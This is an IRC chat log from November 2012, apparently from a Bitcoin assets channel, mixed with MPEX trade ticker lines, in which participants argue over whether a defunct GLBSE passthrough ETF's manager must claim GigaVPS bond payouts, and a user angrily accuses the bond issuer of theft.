the bonds and GigaVPS intends to pay on them. Nov 24 02:31:13 ok, let him pay. Nov 24 02:31:24 You technically have the duty to collect those coupons and dispense them. Nov 24 02:32:35 see, this is where the imagination part comes in. Nov 24 02:32:56 where in the contract does it say that "even if more fees, costs or proceedures will be imposed, the issuer will complete these" Nov 24 02:33:05 "Any and all revenue paid by the underlying will be distributed to the shareholders of this asset without remainder." Nov 24 02:33:22 there you go. did i receive revenue i've not distributed ? Nov 24 02:33:44 You technically have but you're not claiming them. Nov 24 02:33:50 no, i'm not. Nov 24 02:34:04 it doesn't say "all revenue paid will be distributed and all revenue offered for claim will be claimed" Nov 24 02:35:14 and if tomorrow gigavps comes up with a 10x dividend payment if i sleep with him, irrespective of what you may think my duty is, i ain't sleeping with him either. Nov 24 02:35:45 c'mon, one little bj for the shareholders? Nov 24 02:35:57 He's not asking any payment either, simply to identify yourself officially. Nov 24 02:36:19 that sounds like payment to me :/ Nov 24 02:36:19 [MPEX] [S.MPOE] 29548 @ 0.00050803 = 15.0113 BTC [-] Nov 24 02:36:20 [MPEX] [S.MPOE] 24052 @ 0.00050278 = 12.0929 BTC [-] Nov 24 02:36:24 info is valuable Nov 24 02:37:03 If you say so. You may value it. Nov 24 02:37:08 well, he's asking to identify myself in a particular way Nov 24 02:37:17 i dunno, mircea_popescu it is a little shocking that you arn't trying to recover the value there Nov 24 02:37:23 which, because of it's nature, imposes a cost on my part, which isn't trivial, cause i have to put lawyers at work. Nov 24 02:37:37 smickles what do you think the value is ? Nov 24 02:37:54 hmm, good point, it would be weighed against the cost Nov 24 02:38:07 [MPEX] [S.MPOE] 14200 @ 0.00051086 = 7.2542 BTC [+] Nov 24 02:38:07 i'd be much surprised if the entire series is actually worth 300 btc right now. Nov 24 02:38:08 [MPEX] [S.MPOE] 4600 @ 0.00051369 = 2.363 BTC [+] Nov 24 02:38:17 by the time the stuff is actually processed and alll... heh. Nov 24 02:38:49 eventually someone brings asics to the table. maybe not this month, maybe not the next. Nov 24 02:38:55 how many shares were ther? Nov 24 02:39:04 ~1000 Nov 24 02:39:05 something over 1mn iirc Nov 24 02:39:16 Well 1mn of the ETF Nov 24 02:39:51 "where in the contract does it say that "even if more fees, costs or proceedures will be imposed, the issuer will complete these"" Nov 24 02:39:53 maybe 45 btc Nov 24 02:40:50 Namjies: that would be the fiduciary responsibility Nov 24 02:41:16 I'd consider it a breach of contract. Being on the receiving end of that contract, any undefined situation should be treated in my favor unless a conditional clause goes against that. Nov 24 02:41:31 heh. i don't think you can get that much mileage out of this. Nov 24 02:41:34 Namjies: so you expect him to pay the expenses out of pocket? Nov 24 02:42:09 Namjies when did you buy these ? (i presume you actually have some ?) Nov 24 02:42:20 Namjies: maybe just show your STAT to the lawyer guy and you can get the gigamining shares directly Nov 24 02:42:49 lol that'd be something. Nov 24 02:42:56 it should be easy enough to explain tho Nov 24 02:43:27 I think he's grossly exaggerating the fee to make an affidavit... but yes. He states he will never own less shares than the float. That should be done regardless of requirements if the shares remain valid. Nov 24 02:43:44 except the shares are gone since oct the 5th. Nov 24 02:43:45 how did he stop owning theM? Nov 24 02:44:22 anyway, the fiduciary duty is mostly : to not have conflicting duties, to not profit by fiduciary position Nov 24 02:44:29 i'm doing neither, so it'd seem that's a moot point. Nov 24 02:44:31 I mean in Namjies argument, if they still exist, then mircea_popescu never stopped owning them Nov 24 02:44:43 The GLBSE is gone. I'm pretty sure we went over the fact the bonds do not require GLBSE to exist. Nov 24 02:44:54 you went over it. i never bought your theory. Nov 24 02:45:03 but to the point : when did you actually buy these shares ? Nov 24 02:45:21 As such, all stocks/stocks/etc. require an exchange to exist? Nov 24 02:45:38 ok then, mircea_popescu still owns the bonds, giga has an address to send cupons to, why is it mircea's fault the dividends arn't being sent? Nov 24 02:45:57 I don't recall the date. Over a month ago I believe. Nov 24 02:46:57 smickles: It's not his fault, it's GLBSE's. GigaVPS has to identify the claimers as GLBSE data cannot be fully trusted. Nov 24 02:47:02 [MPEX] [S.MPOE] 23668 @ 0.00051369 = 12.158 BTC [+] Nov 24 02:47:03 [MPEX] [S.MPOE] 7600 @ 0.00051374 = 3.9044 BTC [+] Nov 24 02:47:05 [MPEX] [S.MPOE] 6982 @ 0.00051379 = 3.5873 BTC [+] Nov 24 02:48:25 Regardless if it's his fault or not, Mircea should honor the contract as stated, regardless of requirements. There's no exception/discharge of responsibility in various situations for the ETF manager. Nov 24 02:48:32 but to the point : when did you actually buy these shares ? <<< Nov 24 02:49:08 That's basically the same argument I had against Patrick Harnett when I was defending you Mircea against Joel Katz. Nov 24 02:49:25 for crying out loud. when man! Nov 24 02:49:29 Because Patrick simply stated that deposits could be withdrawn anytime. Nov 24 02:49:48 That the deposits are lost didn't matter as per the contract. Nov 24 02:49:56 [19:45] I don't recall the date. Over a month ago I believe. Nov 24 02:50:11 Around mid-october. Nov 24 02:50:16 over a month ago ? you mean, after glbse collapsed ? Nov 24 02:50:23 Aye. Nov 24 02:50:30 did you ask any of these questions then ? Nov 24 02:51:14 No. As far as I'm concerned, all bonds, shares, etc. on GLBSE would remain valid, even without an exchange. Nov 24 02:51:31 right. Nov 24 02:51:45 so you bought a distressed asset on a vague contract and didn't ask Nov 24 02:51:56 on the theory that then you can claim vague should be construed in your favour ? Nov 24 02:52:03 Well the financial vehicle and the place they are traded are 2 different entities. Nov 24 02:52:19 looky. had you gotten lucky and things went smooth with giga, you'd have made some money, i imagine. Nov 24 02:52:30 it didn't work out. that's business. no point in raising nonsensical arguments out of it. Nov 24 02:53:33 mircea_popescu: do you have an opinion on these asic thingies? Nov 24 02:53:41 in what sense ? Nov 24 02:53:45 So you're pulling a Joel Katz argument on me? Since it would cause a loss to you to manage the ETF, I should eat the loss too? Nov 24 02:54:01 do they seem worthwhile to purchase to you? Nov 24 02:54:08 i'm not pulling anything. you expect something to happen. i ask why,. you say cause you expect it. i say ok. Nov 24 02:54:11 let's wait together ? Nov 24 02:54:15 smickles no. Nov 24 02:54:17 So keeping ownership of the bonds and keeping payments going should be dropped because it involves administrative/legal fees? Nov 24 02:54:17 [MPEX] [S.MPOE] 12918 @ 0.00051379 = 6.6371 BTC [+] Nov 24 02:54:18 [MPEX] [S.MPOE] 25303 @ 0.00051383 = 13.0014 BTC [+] Nov 24 02:54:19 [MPEX] [S.MPOE] 8427 @ 0.00051384 = 4.3301 BTC [+] Nov 24 02:54:35 mircea_popescu: because mining is such a low margin activity? Nov 24 02:54:46 smickles i suspect there's going to be a "real" asic run Nov 24 02:54:55 blowing the current hacked-together stuff out of water. Nov 24 02:55:00 (if current stuff ever delivers) Nov 24 02:55:21 ah, one not offered to the public? Nov 24 02:55:24 [MPEX] [S.MPOE] 32900 @ 0.00051016 = 16.7843 BTC [-] Nov 24 02:55:25 well, later. Nov 24 02:55:43 So keeping ownership of the bonds and keeping payments going should be dropped because it involves administrative/legal fees? <<< should any admin/legal fees be expended whatsoever to guarantee someone's shares ? Nov 24 02:56:04 smickles i imagine towards the end of the year someone's finally going to make a proper asic run. Nov 24 02:56:09 Yes, considering managing the ETF is your responsibility. Nov 24 02:56:13 someone like i dunno, prolly not sony, but maybe amd. Nov 24 02:56:22 ya well, this isn't how the world works. Nov 24 02:56:44 There was no clause discharging you of any responsibility to that matter in case fees would be involved. Nov 24 02:56:53 sure there was Nov 24 02:57:03 i specifically said, even here iirc to you, that i'm not doing anything actively Nov 24 02:57:13 that was about the upgrade i think, back in august or w/e Nov 24 02:57:26 Ah, but the upgrade is a different matter. Nov 24 02:57:27 or maybe it wasn't you, was it bugpowder ? Nov 24 02:57:32 how is it different ? Nov 24 02:57:43 It was to exchange the bonds for another asset, in exchange of a fee. Nov 24 02:57:58 You have no obligation to convert a bond into a new bond. Nov 24 02:58:03 [MPEX] [S.MPOE] 5408 @ 0.00051384 = 2.7788 BTC [+] Nov 24 02:58:04 [MPEX] [S.MPOE] 32150 @ 0.00051396 = 16.5238 BTC [+] Nov 24 02:58:06 [MPEX] [S.MPOE] 4988 @ 0.00051415 = 2.5646 BTC [+] Nov 24 02:58:08 Under a different agreement. Nov 24 02:58:09 whoa ? Nov 24 02:58:15 then there we go. indeed, i don't. Nov 24 02:58:51 In this case the bond has not changed. Nov 24 02:59:05 so if it has not changed then i don't need to do anything. Nov 24 02:59:23 Yes, administrative tasks. Nov 24 02:59:39 this is wordsplay and you know it. Nov 24 03:00:51 One was exchanging ONE security PLUS a fee (Gigamining 5 mhash/s bond + 0.29 BTC) for ANOTHER, COMPLETLY DIFFERENT security (Teramining bonds) Nov 24 03:01:06 [MPEX] [S.MPOE] 11867 @ 0.00051016 = 6.0541 BTC [-] Nov 24 03:01:18 The other is identifiying yourself through a claim for the same existing bond (Gigamining). Nov 24 03:01:32 except it's not the same existing bond. Nov 24 03:01:35 Those two scenarios are different. It's not wordplay. Nov 24 03:01:39 at best it's some replacement/reconstruction thing. Nov 24 03:02:07 It remains a gigamining bond paying 5 mhash/s perpetually. Nov 24 03:02:16 so ? Nov 24 03:02:34 two 100 W light bulbs aren't the same lightbulb Nov 24 03:02:39 they're jsut two things made to the same spec. Nov 24 03:02:44 So it's not a new security. It's the same, except it moved off an exchange. Nov 24 03:03:06 Moving off an exchange creates a new identical security, according to you? Nov 24 03:03:47 Which is not the same, just identical? Nov 24 03:03:48 nope. Nov 24 03:03:58 what do you mean "not the same just identical" Nov 24 03:04:35 That it would somehow be a "new" security, with an identical contract but that doesn't relate at all to the previous one on the exchange. Nov 24 03:04:44 https://bitcointalk.org/index.php?topic=127488.0 this is heating up Nov 24 03:05:16 in general it would depend on the particulars. in the particulars of all glbse securities, this is true, any reconstruction either private or on a new exchange is a new security. Nov 24 03:07:26 Well I disagree on that point. When an exchange drops an asset, it usually remains the same asset. An ETF holding it would have to keep the shares even if it implies more administrative costs in managing their ownership off an exchange. Nov 24 03:08:09 the case of exchanges dropping assets is irrelevant. glbse had not the ability to do that. Nov 24 03:08:13 their assets were baked in. Nov 24 03:08:32 and no, when shares go off the exchanges into the pink sheets the funds do not keep them. Nov 24 03:08:39 they sell them off at any price. Nov 24 03:09:02 Well then, you should sell your claim to them. Nov 24 03:09:20 [MPEX] [S.MPOE] 233 @ 0.00051016 = 0.1189 BTC [-] Nov 24 03:09:20 [MPEX] [S.MPOE] 1312 @ 0.00050278 = 0.6596 BTC [-] Nov 24 03:09:22 [MPEX] [S.MPOE] 9305 @ 0.00050131 = 4.6647 BTC [-] Nov 24 03:09:25 if they had been dropped by the exchange i could. Nov 24 03:09:38 they weren't. they were just destroyed, practically speaking. Nov 24 03:09:50 "practically" Nov 24 03:10:00 well ya, practically. they can't be traded. Nov 24 03:10:08 technically, the exchange didn't drop them. The exchange was closed definitly. Nov 24 03:10:14 right. Nov 24 03:10:24 Forcing all assets on it out. Not voiding them. Nov 24 03:10:42 this is what you'd like it to be. whether it actually is ... well... Nov 24 03:10:45 doesn't convince me. Nov 24 03:11:13 So all GLBSE asset issuers are entitled to not pay any shareholders anymore, is that what you claim? Nov 24 03:11:26 it's not what i claim, it's what the case is. Nov 24 03:11:48 the fact that people still expect to be paid... well... of course they do, people always do. but they have pretty much no claim to it. Nov 24 03:12:26 Because any holder would be hard pressed to prove ownership? The official data is being released. Nov 24 03:12:55 As far as I'm concerned, that's good enough for claims. Nov 24 03:12:58 the correct civil avenue is : all shareholders sue glbse. Nov 24 03:13:07 they recover whatever they recover. Nov 24 03:13:15 glbse sues issuers. they recover w/e they recover. Nov 24 03:13:30 since glbse is not solvent this is a moot point however. Nov 24 03:14:12 i don't see why you think it's good enough for claims. what weigh does it have ? Nov 24 03:15:55 It's basically the premise of GLBSE as the very poor ownership proof system it had. That GLBSE's records is the ownership proof. Nov 24 03:16:19 someone claims it's bullshit. Nov 24 03:16:26 how do you on the basis of this proof of yours disprove his claim ? Nov 24 03:18:43 Same for official stock exchanges... ownership is what the records say. Nov 24 03:19:02 01:08 < Namjies> Well then, you should sell your claim to them. << offer him any amount Nov 24 03:19:07 you mean official as in mpex or official as in nyse ? Nov 24 03:19:17 glbse records were provided by someone with an official scarlett letter of the forums though Nov 24 03:19:29 both Nov 24 03:19:42 Yes, GLBSE records are far less documented. Nov 24 03:19:43 smickles sadly the "do not further assign thing" fucks this. Nov 24 03:19:57 In both case, ownership is the records tho. Nov 24 03:20:03 aw, i was going to bid 0.001btc Nov 24 03:20:32 something doesn't become acceptable just because it's the only straw you have Namjies Nov 24 03:20:43 there's some minimum levels to satisfy. Nov 24 03:20:56 a "proof of ownership" that fails to disprove contrary claim is no such proof. Nov 24 03:21:14 Aye. Nov 24 03:21:19 it may be indication of ownership, sure Nov 24 03:21:30 and i don't dispute the released lists are some indication of ownership Nov 24 03:23:50 So what do you require to act at all on anything? Personal benefit or not interested? Nov 24 03:23:53 the very reason people are stuck with messes such as giga's is exactly that : they find themselves in a situation where they have to assign other people's propetyu Nov 24 03:23:56 but have no actual proof. Nov 24 03:25:01 Namjies look, the thing doesn't make sense to pursue. Nov 24 03:25:42 i'd have to research as what i'm accepting them. i'd have to research how can i handle them once accepted. i'd prolly have to take them off mpex. on it goes. Nov 24 03:26:54 [MPEX] [S.MPOE] 16900 @ 0.00051415 = 8.6891 BTC [+] Nov 24 03:27:07 I am uncertain why. It seems you only want to avoid any procedure/work/costs at any price.He simply requires you identify yourself along with a notarized claim that you own X shares. Nov 24 03:27:18 "yourself". is this me or some company ? Nov 24 03:27:39 Yourself. Nov 24 03:27:43 why ? Nov 24 03:27:51 you have all these answers ready in your head Nov 24 03:28:00 then a month or so down the road they run you into a wall Nov 24 03:28:01 The ETF's owner listed is Mircea Popescu, not MPEx, according to the ETF page. Nov 24 03:28:07 then you insist on having ready answers in your head. Nov 24 03:28:42 do you understand why i'd want a lawyer to research and report as to whether i'd better claim as a real person or as a legal person ? Nov 24 03:29:09 Yes. For protecting yourself. Nov 24 03:30:09 so in short : i'm glad you see a duty of care for the btc thing. i don't see why you imagine it can be extended into this "free anything forever" construction. Nov 24 03:30:37 and for the record, i'd be rather surprised if what giga offers actually is a weekly btc payout. Nov 24 03:30:48 the logical thing would be for him to offer a dollar settlement to all applicants. Nov 24 03:30:49 [MPEX] [S.MPOE] 18745 @ 0.00050131 = 9.3971 BTC [-] Nov 24 03:30:50 [MPEX] [S.MPOE] 4431 @ 0.00049846 = 2.2087 BTC [-] Nov 24 03:31:19 But being listed as the owner and manager of the ETF, dropping the bonds altogether because it involves legal fees doesn't seem to be the best way to do that. The ETF's manager legal liability and related costs are not ETF holders concerns. Nov 24 03:31:47 [MPEX] [S.MPOE] 19050 @ 0.00051415 = 9.7946 BTC [+] Nov 24 03:31:56 they are, insamuch as they arise from the actual issuer. Nov 24 03:31:59 Those fees would be extra to protect yourself through consultation regarding the claim process. Nov 24 03:32:38 basically, the way this worked out is this : i had X owned by Y on exchange Z. exchange Z dissapeared, destroying the records of X. there's some indication of the ownership on the basis of which Y wants to create unspecified something which you assume is X'. Nov 24 03:33:51 now if you imagine that i will out of my own time and money a) go through whatever hoops Y comes up with and b) pay counsel to advise as to whether those hoops are safe Nov 24 03:33:55 you're dreaming in a fantasy world. Nov 24 03:34:05 it's true the etf holders can't be held for those fees. Nov 24 03:34:11 this is the very reason no action shall be taken. Nov 24 03:37:38 Hmm... is fees incured by an ETF supposed to be shared among the holders. Nov 24 03:37:41 [MPEX] [S.MPOE] 6870 @ 0.00049846 = 3.4244 BTC [-] Nov 24 03:37:42 [MPEX] [S.MPOE] 5480 @ 0.0004982 = 2.7301 BTC [-] Nov 24 03:38:01 Or is the ETF issuer responsible for such fees, would be the question. Nov 24 03:39:06 Usually an ETF issuer should have management fees charged to the fund and be responsible for incurred fees related to it's management. Nov 24 03:39:28 As far as I know. Nov 24 03:39:31 [MPEX] [S.MPOE] 25920 @ 0.0004982 = 12.9133 BTC [-] Nov 24 03:39:33 [MPEX] [S.MPOE] 13867 @ 0.00049797 = 6.9053 BTC [-] Nov 24 03:39:34 [MPEX] [S.MPOE] 16764 @ 0.00049617 = 8.3178 BTC [-] Nov 24 03:39:40 Although this ETF charged nothing at all. Nov 24 03:39:53 it charged nothing and it did nothing other than split up all payments received. Nov 24 03:40:10 that was the original idea, and for the very reason that anything else is too difficult to spell out in a contract. Nov 24 03:40:30 i still think this is the correct way to make such a passthrough thing Nov 24 03:42:35 Well fine. I'd say so too. I don't believe it's fair to require you to incur the fee now required after GLBSE's fiasco. But the need for simple thing, I still say it doesn't excuse you would have required a proper contract where you had protective clauses for yourself. Nov 24 03:42:37 fees are totally shared by the etf holders, it's usually communicated by an expense ratio Nov 24 03:43:01 and they do change Nov 24 03:43:23 easly granted that the contract is not the best. Nov 24 03:43:42 Hmm, but does this applies to all ETF or is it how ETF contracts are usually layed out? Nov 24 03:43:48 it's one of the earliest too. Nov 24 03:44:20 Could an ETF charge a management fee and assume all management/legal costs in their contract? Nov 24 03:44:39 a managed fund would normally. Nov 24 03:44:45 an automatic/index fund would not. Nov 24 03:45:17 the etf contracts i've read don't explicitly mention the fee Nov 24 03:45:18 kinda the reason index funds outperform managed funds, that fee. Nov 24 03:45:26 the fee is asigned afterwards Nov 24 03:45:54 Well I'll default on assuming it was an automatic/index one since you didn't charge a fee, even if not specified as such. Nov 24 03:47:06 Namjies: thing is, as described, the giga.etf wasn't actually an etf Nov 24 03:47:12 it was an SPV Nov 24 03:47:30 etspv lol Nov 24 03:47:39 How do SPV usually work? Nov 24 03:47:48 there is no usual in spv land Nov 24 03:48:02 spvs are these vehicles created in derivative trades rto insulate the parties Nov 24 03:48:06 "Special Purpose Vehicle" Nov 24 03:48:11 bank A wants to trade swap type X with bank B Nov 24 03:48:27 A makes SPV A1, B makes SPV B1, then B1 and A1 enter the contract Nov 24 03:48:47 the SPVs can go bankrupt without touching A or B, and also their assets are off-balancesheet Nov 24 03:54:28 Hmm... well Gigavps lawyer is in charge of this claim process and claims are sent to him. Nov 24 03:55:06 I could always check with him if I can make a second claim for my interest in the ETF. Nov 24 03:55:19 didn;t you hold a bunch of giga on glbse too ? or am i confused Nov 24 03:55:25 Yes Nov 24 03:55:33 something like 2k or w/e ? Nov 24 03:55:46 No, almost 400 Nov 24 03:55:48 it was you that had that spreadsheet i remember, no ? Nov 24 03:55:54 37Xish I think Nov 24 03:56:06 [MPEX] [S.MPOE] 26200 @ 0.00050484 = 13.2268 BTC [+] Nov 24 03:56:08 [MPEX] [S.MPOE] 10100 @ 0.00050801 = 5.1309 BTC [+] Nov 24 03:56:26 384 Nov 24 03:56:32 aha. Nov 24 03:56:42 those I can claim Nov 24 03:56:43 jcpham hey i forgot to ask, did pirate pay ? Nov 24 03:57:28 GPG signed statements are technically valid legally and I have the signed contract and the signed statement. Nov 24 03:58:16 Namjies you mean the contract as displayed on the etf ? Nov 24 03:58:31 Aye Nov 24 03:58:52 you can try, but gigamining would i imagine point out that it was assigned glbse shares, which is true. Nov 24 04:00:16 Let me guess, you have not provided GLBSE an email & BTC address? As such you're not even on Gigavps's list to start with? Nov 24 04:00:42 Or did you provide that, assuming Gigavps would pay without further requirements? Nov 24 04:00:52 i don't personally have a glbse acct even. Nov 24 04:00:59 ah Nov 24 04:01:11 WAIT Nov 24 04:01:35 lol Nov 24 04:01:37 wut ? Nov 24 04:02:13 If you don't have an account, then it's the GLBSE account owner who technically has to make the claim. He was the one proxying for you who was proxying for the ETF holders. Nov 24 04:02:17 [MPEX] [S.MPOE] 21200 @ 0.00049722 = 10.5411 BTC [-] Nov 24 04:02:31 yea. Nov 24 04:02:33 The claim has to be made associated with the BTC address provided to GLBSE. Nov 24 04:03:10 As such I could simply claim with my signed statement from MPEx directly with that person, assuming that person will be making the claim. Nov 24 04:03:26 Especially if that person didn't hold shares strictly for you. Nov 24 04:03:41 they did. Nov 24 04:03:50 Ah. Nov 24 04:04:13 [MPEX] [S.MPOE] 10100 @ 0.00049722 = 5.0219 BTC [-] Nov 24 04:04:14 [MPEX] [S.MPOE] 936 @ 0.00049617 = 0.4644 BTC [-] Nov 24 04:04:16 [MPEX] [S.MPOE] 27125 @ 0.00049566 = 13.4448 BTC [-] Nov 24 04:04:17 [MPEX] [S.MPOE] 11939 @ 0.00049549 = 5.9157 BTC [-] Nov 24 04:04:17 So they'd have to make the claim strictly for you... Nov 24 04:04:31 i could make it just as well. Nov 24 04:04:50 Well basically, anyone can make a claim. Nov 24 04:05:06 no, what i'm saying is, this detail is not important, i could actually make the claim as well as they could. Nov 24 04:05:30 Yes. Nov 24 04:05:41 right. Nov 24 04:09:22 November 20 Hey all, I am attempting to start a new business where people can buy and sell bitcoins easily and safely Nov 24 04:09:52 MPOE-PR points him to the "wanna start a business thread" Nov 24 04:10:06 November 21 Thanks for the suggestion. So far we have been pretty successful doing a bunch of transactions Nov 24 04:10:19 November 23 We were just scammed by someone Nov 24 04:10:33 ... Nov 24 04:10:33 ;;google triple facepalm Nov 24 04:10:34 Triple FacePalm Pictures, Images and Photos - Photobucket: ; Urban Dictionary: triple facepalm: ; After double facepalm, here comes triple facepalm - SemiAccurate ...: Nov 24 04:11:07 [MPEX] [S.MPOE] 14601 @ 0.00050732 = 7.4074 BTC [+] Nov 24 04:11:08 [MPEX] [S.MPOE] 8978 @ 0.00050801 = 4.5609 BTC [+] Nov 24 04:13:19 [MPEX] [S.MPOE] 771 @ 0.00051216 = 0.3949 BTC [+] Nov 24 04:21:21 [MPEX] [S.MPOE] 23334 @ 0.00050679 = 11.8254 BTC [-] Nov 24 04:29:53 [MPEX] [S.MPOE] 6195 @ 0.00050679 = 3.1396 BTC [-] Nov 24 04:29:55 [MPEX] [S.MPOE] 48257 @ 0.00050936 = 24.5802 BTC [+] Nov 24 04:32:47 Well Mircea, could you at least let me know if the person holding shares for you on GLBSE will claim them? Nov 24 04:32:59 or should I say, held Nov 24 04:34:58 [MPEX] [S.MPOE] 19943 @ 0.00050936 = 10.1582 BTC [+] Nov 24 04:34:59 [MPEX] [S.MPOE] 3457 @ 0.00051415 = 1.7774 BTC [+] Nov 24 04:41:03 [MPEX] [S.MPOE] 40400 @ 0.00050665 = 20.4687 BTC [-] Nov 24 04:41:05 [MPEX] [S.MPOE] 5250 @ 0.00050303 = 2.6409 BTC [-] Nov 24 04:41:06 [MPEX] [S.MPOE] 7350 @ 0.00050181 = 3.6883 BTC [-] Nov 24 04:47:14 Namjies nope. as in, won;'t claim them. Nov 24 04:47:19 obviously we've talked about this. Nov 24 04:49:21 Ok, so no one is claiming them. Nov 24 04:51:42 nope. Nov 24 04:53:38 [MPEX] [S.MPOE] 14800 @ 0.00050267 = 7.4395 BTC [+] Nov 24 04:54:20 [MPEX] [S.MPOE] 9000 @ 0.00050946 = 4.5851 BTC [+] Nov 24 04:54:22 [MPEX] [S.MPOE] 5800 @ 0.00051299 = 2.9753 BTC [+] Nov 24 04:54:23 [MPEX] [S.MPOE] 8352 @ 0.00051415 = 4.2942 BTC [+] Nov 24 04:54:23 [MPEX] [S.MPOE] 19738 @ 0.0005143 = 10.1513 BTC [+] Nov 24 04:57:38 [MPEX] [S.MPOE] 24250 @ 0.0005143 = 12.4718 BTC [+] Nov 24 05:09:27 [MPEX] [S.DICE] 200 @ 0.00334934 = 0.6699 BTC [+] Nov 24 05:09:44 [MPEX] [S.MPOE] 38400 @ 0.00050888 = 19.541 BTC [-] Nov 24 05:27:03 [MPEX] [S.MPOE] 6932 @ 0.00050386 = 3.4928 BTC [-] Nov 24 05:27:04 [MPEX] [S.MPOE] 7809 @ 0.00051006 = 3.9831 BTC [+] Nov 24 05:27:05 [MPEX] [S.MPOE] 18969 @ 0.0005143 = 9.7558 BTC [+] Nov 24 05:27:16 http://blog.smickles.com/wp-content/uploads/2012/11/keep-calm-and-buy-bitcoins.png Nov 24 05:28:51 Ah, income tax is annoying and complex. And too much exceptions and special cases. Nov 24 05:35:01 Fun bookkeeping... Nov 24 05:36:04 If a government is bent on providing services to the population and public infrastructure, I'd prefer it's budget be levied through a large property tax and luxury tax. Nov 24 05:36:27 Might achieve just the same thing, except it would be easier to manage for everyone and harder to evade. Nov 24 05:40:45 [MPEX] [S.MPOE] 36300 @ 0.0005143 = 18.6691 BTC [+] Nov 24 05:41:42 [MPEX] [S.MPOE] 6999 @ 0.0005143 = 3.5996 BTC [+] Nov 24 05:41:44 [MPEX] [S.MPOE] 42301 @ 0.00051431 = 21.7558 BTC [+] Nov 24 05:45:28 [MPEX] [S.MPOE] 10033 @ 0.00051397 = 5.1567 BTC [-] Nov 24 05:45:47 Namjies donations only. Nov 24 05:57:00 [MPEX] [S.MPOE] 31550 @ 0.00051397 = 16.2158 BTC [-] **** BEGIN LOGGING AT Sat Nov 24 14:54:14 2012 Nov 24 14:57:59 time for giga drama Nov 24 15:01:16 [MPEX] [S.MPOE] 19550 @ 0.00050791 = 9.9296 BTC [+] Nov 24 15:01:58 [MPEX] [S.MPOE] 13313 @ 0.00050774 = 6.7595 BTC [-] Nov 24 15:02:00 [MPEX] [S.MPOE] 4200 @ 0.00051307 = 2.1549 BTC [+] Nov 24 15:02:01 [MPEX] [S.MPOE] 1832 @ 0.00051415 = 0.9419 BTC [+] Nov 24 15:06:23 o, it's been raging since yest Nov 24 15:07:48 i liked that dog barking quote Nov 24 15:08:03 honestly im shocked giga is doing this Nov 24 15:08:10 he will be acting as a broker more or less Nov 24 15:08:21 well i guess he is not letting the stuff trade... Nov 24 15:08:24 i bet you he'll offer a cash settlement. Nov 24 15:08:36 i dunno where people get the idea they will receive some replacement bond Nov 24 15:09:19 for what? Nov 24 15:09:20 i dont think giga got a lawyer as good as mine... Nov 24 15:09:23 [MPEX] [S.MPOE] 2144 @ 0.0005064 = 1.0857 BTC [-] Nov 24 15:09:24 [MPEX] [S.MPOE] 21950 @ 0.00050571 = 11.1003 BTC [-] Nov 24 15:09:25 [MPEX] [S.MPOE] 6800 @ 0.00050464 = 3.4316 BTC [-] Nov 24 15:09:26 [MPEX] [S.MPOE] 10106 @ 0.0005046 = 5.0995 BTC [-] Nov 24 15:09:29 oh giga Nov 24 15:11:00 the SEC might still go after giga for what he is doing Nov 24 15:11:16 might still be able to i mean Nov 24 15:12:13 what, if he buys back all the assets? Nov 24 15:12:16 he is changing the deal... that wont fly well, he should have just tried to keep the old one, and told people to deal with GLBSE... Nov 24 15:12:38 if he buys them all back, and people are okay with the price that might work, im not sure Nov 24 15:13:37 [MPEX] [S.MPOE] 5500 @ 0.00051415 = 2.8278 BTC [+] Nov 24 15:25:53 [MPEX] [S.MPOE] 3644 @ 0.0005046 = 1.8388 BTC [-] Nov 24 15:25:55 [MPEX] [S.MPOE] 116392 @ 0.00050413 = 58.6767 BTC [-] Nov 24 15:28:10 [MPEX] [S.MPOE] 27400 @ 0.00051415 = 14.0877 BTC [+] Nov 24 15:28:17 Fuck the SEC, gigavps stole my money Nov 24 15:28:47 violating a contract Nov 24 15:29:29 he got 2 options: 1 pay up or 2 feel the consequences Nov 24 15:29:47 by 2 everyone knows what I mean Nov 24 15:30:03 [MPEX] [S.MPOE] 24558 @ 0.00050413 = 12.3804 BTC [-] Nov 24 15:30:04 [MPEX] [S.MPOE] 11259 @ 0.00050326 = 5.6662 BTC [-] Nov 24 15:30:06 [MPEX] [S.MPOE] 21683 @ 0.00050247 = 10.8951 BTC [-] Nov 24 15:30:17 I will invest as much btc a needed to............... Nov 24 15:30:29 2k should do it Nov 24 15:32:06 at this point gigavps is stealing our money, he took my money without any ID or such, so paying me back would also not require any ID or such Nov 24 15:32:45 We all know who he really is so should be easier to hunt him than Trendon Shavers Nov 24 15:33:53 [MPEX] [S.MPOE] 13467 @ 0.00050247 = 6.7668 BTC [-] Nov 24 15:33:54 [MPEX] [S.MPOE] 30233 @ 0.00050219 = 15.1827 BTC [-] Nov 24 15:38:48 [MPEX] [S.MPOE] 667 @ 0.00050219 = 0.335 BTC [-] Nov 24 15:38:50 [MPEX] [S.MPOE] 7300 @ 0.00050186 = 3.6636 BTC [-] Nov 24 15:38:51 [MPEX] [S.MPOE] 22857 @ 0.00050181 = 11.4699 BTC [-] Nov 24 15:38:52 [MPEX] [S.MPOE] 617 @ 0.00050126 = 0.3093 BTC [-] Nov 24 15:41:39 PsychoticBoy: how would he "pay you back"? at the mpex last 15 day price as the contract specifies? Nov 24 15:41:42 the scammy fuck is online Nov 24 15:42:04 that would mean 0 piggeons Nov 24 15:42:36 ok so he paid you back then Nov 24 15:42:41 what's your problem? Nov 24 15:43:23 last on mpex does not mean last on glbse as stated in contract, but beeside that no dividend etc Nov 24 15:43:51 so how much do you figure one gigavps bond is worth atm ? Nov 24 15:43:54 PsychoticBoy: last 15 days on glbse (which the words glbse are not in the contract for htat) is still 0 Nov 24 15:44:28 so he bought back your contract at 0, thanks nefario Nov 24 15:44:30 sure, keep talking shit, last trade on glbse was 0.78 Nov 24 15:44:53 it doesnt say last trade, it says last 15 days, glbse has been closed more than 15 days Nov 24 15:44:56 read Nov 24 15:45:05 hi PsychoticBoy Nov 24 15:45:17 are you threating me now? Nov 24 15:45:17 hi, pay up dude Nov 24 15:45:25 no threads Nov 24 15:45:29 http://pastebin.com/NhxSKZxb Nov 24 15:45:33 just pay up Nov 24 15:45:54 Should I get scarry? I dont think so Nov 24 15:45:58 what is your email address? how many bonds do you own? Nov 24 15:46:12 I did not auth so everyone could have said that Nov 24 15:46:19 please submit the information requested, and you'll be paid Nov 24 15:46:37 I own lots (probably more than 100 bonds incl FDBF Nov 24 15:46:51 You wont get my ID and such so Nov 24 15:47:08 ;;whois PsychoticBoy Nov 24 15:47:09 ??? (~Psychotic@pdpc/supporter/active/psychoticboy) has been on server kornbluth.freenode.net since 08:06 PM, November 22, 2012 (idle for 17 seconds) and is on #p2pool, #bitcoin-mining, #bitcoin-assets, and #bitcoin. Nov 24 15:47:15 my email and btcaddress I can give you Nov 24 15:47:37 If you send me 